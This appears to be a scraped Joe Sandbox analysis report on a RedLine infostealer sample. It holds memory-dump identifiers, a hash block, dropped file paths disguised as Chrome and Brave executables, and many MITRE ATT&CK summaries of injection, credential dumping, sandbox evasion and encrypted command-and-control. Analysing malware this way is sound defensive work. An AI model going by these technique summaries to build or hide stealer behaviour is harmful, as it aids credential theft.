Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction ID: 1bb0ef846ce5e5b7fe7eaba4dcc06279908a4780dcc5cb9c62aa4397b41e4bb6
Opcode Fuzzy Hash: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction Fuzzy Hash: E7012622B0A64599E625DB33BD04A3B6654BF88FEDF851031DD0E47350CD3EE4D68350

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6iWK0k820U.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_6iWK0k820U.exe_1eb949e99f9ba33a6e7a4c5c9eac28fe3ff63a4e_28263dca_17ec24c5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER874.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99E.tmp.xml

C:\Users\user\AppData\Local\Google\brave.exe

C:\Users\user\AppData\Local\Google\chrome.exe

C:\Users\user\AppData\Local\Google\ofg.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
6iWK0k820U.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre